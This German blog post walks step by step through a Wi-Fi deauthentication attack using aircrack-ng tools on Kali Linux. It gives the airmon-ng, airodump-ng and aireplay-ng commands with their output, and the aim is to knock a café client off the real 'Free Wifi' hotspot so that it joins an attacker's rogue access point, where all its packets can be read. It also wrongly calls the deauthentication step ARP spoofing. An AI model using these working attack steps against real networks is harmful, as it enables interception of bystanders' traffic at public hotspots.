WLAN-Deauthentifizierungsattacken

Nachdem ich im letzten Blogpost „WLAN Access Point unter Linux einrichten“ beschrieben habe, wie simpel das Einrichten eines Rogue APs unter Linux ist, möchte ich hier kurz demonstrieren, wie man einen Client dazu zwingen kann, sich mit dem neuen AP zu verbinden.
Solche Attacken finden immer häufiger an Flughäfen oder anderen öffentlichen Plätzen statt.

Nehmen wir in diesem Beispiel an, dass es einen Hotspot im Café mit dem Namen „Free Wifi“ gibt. Um ein gleichnamiges WLAN zu erstellen, muss man nur die Schritte aus dem oben verlinkten Artikel abarbeiten. Doch um die Clients nun dazu zu überreden, mit dem neuen AP zu sprechen, muss man ihre bestehende Verbindung unterbrechen. Und das ist gar nicht so schwer, wie es sich vielleicht anhört.

Für diese Attacke benutzen wir ein weiteres WLAN-Interface (wlan1) und suchen uns zunächst die MAC-Adresse des originalen APs und den Kanal, auf dem er operiert, heraus. Dafür setzen wir wlan1 in den Monitor-Modus und lauschen auf vorbeifliegende Pakete.

root@kali:~# airmon-ng start wlan1

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID    Name
2335    NetworkManager
2527    wpa_supplicant
2937    dhclient
Process with PID 2937 (dhclient) is running on interface wlan0

Interface    Chipset        Driver

wlan0        Intel 3945ABG    iwl3945 – [phy0]
wlan1        Unknown     rtl8192cu – [phy1]
(monitor mode enabled on mon0)

 

root@kali:~# airodump-ng mon0

Wir finden dadurch die MAC-Adresse des APs (in diesem Fall AA:AA:AA:AA:AA:AA) und den Kanal (hier Kanal 1) heraus. Um aktiv verbundene Clients zu finden, können wir zum Beispiel Tools wie Kismet verwenden.

Doch damit unsere Pakete hinterher auch ankommen, müssen wir auf dem gleichen Kanal wie der originale AP operieren. Dazu stoppen wir den Monitor-Modus auf dem Interface und starten ihn erneut auf dem richtigen Kanal:

root@kali:~# airmon-ng stop wlan1

root@kali:~# airmon-ng start wlan1 1

Die „1“ gibt in diesem Fall die Kanalnummer an.

Wenn wir annehmen, dass unser Client die MAC-Adresse BB:BB:BB:BB:BB:BB besitzt, lautet das Kommando, um per ARP-Spoofing Deauthentifizierungs-Pakete zu schicken:

root@kali:~# aireplay-ng -0 10 -a AA:AA:AA:AA:AA:AA -c BB:BB:BB:BB:BB:BB mon0

Die Bedeutung der Parameter sind wie folgt:

  • -0 bedeutet Deauthentifizierung
  • 10 ist die Anzahl der Pakete (0 für unendlich viele)
  • -a ist die gespoofte MAC-Adresse des APs
  • -c ist die MAC des Clients.
  • mon0 ist das Interface, was zum Senden benutzt werden soll

Falls kein Client mit -c angegeben wird, werden Broadcast-Pakete geschickt, doch viele Systeme ignorieren Deauthentifizierungspakete, die per Broadcast kommen.
Sollte nun der angegriffene Client in der Nähe sein und somit das Signal des eigenen APs stärker sein als das originale, wird er sich in unserem WLAN einbuchen, wodurch alle Pakete mitgelesen werden können.

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.